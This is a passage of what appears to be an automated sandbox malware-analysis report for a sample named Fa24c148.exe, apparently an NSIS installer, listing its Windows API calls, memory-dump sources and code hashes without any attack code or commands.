                                                                                                    • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 00406095
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$Prev
                                                                                                    • String ID: "C:\Users\user\Desktop\Fa24c148.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 589700163-3770697539
                                                                                                    • Opcode ID: 3b4e1c3ec424bf1de7da59c711653df59d062fb970fe0516104cac3d90234bf4
                                                                                                    • Instruction ID: 5f8db4d4ef1aaeb388f58d13ad2a41ec80f6628d4c19804d17f22981d69c56f6
                                                                                                    • Opcode Fuzzy Hash: 3b4e1c3ec424bf1de7da59c711653df59d062fb970fe0516104cac3d90234bf4
                                                                                                    • Instruction Fuzzy Hash: 5311C45684121299DB30BB199C40BB7A2E8EF54790F52803FED8A733C1E77C5C9286BD
                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nslCCA0.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nslCCA0.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                    • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                    • String ID: 8$C:\Users\user\AppData\Local\Temp\nslCCA0.tmp$C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll
                                                                                                    • API String ID: 1453599865-999268466
                                                                                                    • Opcode ID: 7ff42c571deb340bf81926ce0c082dd5313d153aba56cb08d0eeabb960131028
                                                                                                    • Instruction ID: 7a030a9c095cf7661290fe091fec1a729e70b9dbbd1292938289fd6a30d2cb41
                                                                                                    • Opcode Fuzzy Hash: 7ff42c571deb340bf81926ce0c082dd5313d153aba56cb08d0eeabb960131028
                                                                                                    • Instruction Fuzzy Hash: 18018071A04204FFD700AFA09E89EAF7378AB10319F20453BB202B61D1D6B85D419A2D
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404040
                                                                                                    • GetSysColor.USER32(00000000), ref: 0040405C
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404068
                                                                                                    • SetBkMode.GDI32(?,?), ref: 00404074
                                                                                                    • GetSysColor.USER32(?), ref: 00404087
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404097
                                                                                                    • DeleteObject.GDI32(?), ref: 004040B1
                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004040BB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2320649405-0
                                                                                                    • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                    • Instruction ID: 7833da122bd5b54dba07469e608d39c2309fd7833842469cb0c606e819627665
                                                                                                    • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                    • Instruction Fuzzy Hash: 5A2184B19047449BCB319F68DD08B5B7BF8AF40714F048A29EA95F22E0C738E904CB65
                                                                                                    APIs
                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                      • Part of subcall function 00405A66: ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B1,00000000,00000000,00402FF1,000000FF,00000004,00000000,00000000,00000000), ref: 00405A7A
                                                                                                      • Part of subcall function 00405CBE: wsprintfW.USER32 ref: 00405CCB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                    • String ID: 9
                                                                                                    • API String ID: 1149667376-2366072709
                                                                                                    • Opcode ID: 7d41bcd3dae3dae80b68e9040ec7ff24257b7140080f1b6cb91404220a5539cb
                                                                                                    • Instruction ID: a762cbfc482fee2f38ad097521ed942063d68533c50e5d13a1d21fd8ed512a93
                                                                                                    • Opcode Fuzzy Hash: 7d41bcd3dae3dae80b68e9040ec7ff24257b7140080f1b6cb91404220a5539cb
                                                                                                    • Instruction Fuzzy Hash: 2E51E671E04209ABDF24DF94DE88AAEB779FF14304F50443BE501B62D0D7B99A42CB69
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3294113728-0
                                                                                                    • Opcode ID: 09ec96b44468b6559568886edfe2b22b6abacdf6cac7a22eaf78803dc8c7711a
                                                                                                    • Instruction ID: 39eb73ea935b4093d5e0ae2fe9f4df3abe493bf7cf7ddc07517dddc298ecdb3a
                                                                                                    • Opcode Fuzzy Hash: 09ec96b44468b6559568886edfe2b22b6abacdf6cac7a22eaf78803dc8c7711a
                                                                                                    • Instruction Fuzzy Hash: 0531C272C00118BBDF11AFA5CE49DAF7E79EF08368F24423AF510762D0C6795E418BA9
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404906
                                                                                                    • GetMessagePos.USER32 ref: 0040490E
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404928
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040493A
                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404960
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                    • String ID: f
                                                                                                    • API String ID: 41195575-1993550816
                                                                                                    • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                    • Instruction ID: 5094cac0cfd66b0e8cfd3256396541bb223221662a15d93018ee399e52c78ab9
                                                                                                    • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                    • Instruction Fuzzy Hash: B9014071D00219BADB00DBA4DD45FFFBBB8AB95B21F10016ABB10B71C0C7B4A5018B95
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                    • MulDiv.KERNEL32(000F568E,00000064,000F5692), ref: 00402CC8
                                                                                                    • wsprintfW.USER32 ref: 00402CD8
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402CE8
                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CFA
                                                                                                    Strings
                                                                                                    • verifying installer: %d%%, xrefs: 00402CD2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                    • String ID: verifying installer: %d%%
                                                                                                    • API String ID: 1451636040-82062127
                                                                                                    • Opcode ID: 4a7d612a3107a8faa67c2a3ba57bc865a53d9af2ae63cae8aa971940a760aa5f
                                                                                                    • Instruction ID: 00b8461607dcb0b3980451466b6828af2013657049940e2aaaac4a967361d4db
                                                                                                    • Opcode Fuzzy Hash: 4a7d612a3107a8faa67c2a3ba57bc865a53d9af2ae63cae8aa971940a760aa5f
                                                                                                    • Instruction Fuzzy Hash: F5012170604208BBEF249F60DD49BAE3B69FB00305F008039FA06A52D1DBB99954DB59
                                                                                                    APIs
                                                                                                    • GetDC.USER32(?), ref: 00401D44
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                    • CreateFontIndirectW.GDI32(0040BD58), ref: 00401DBC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
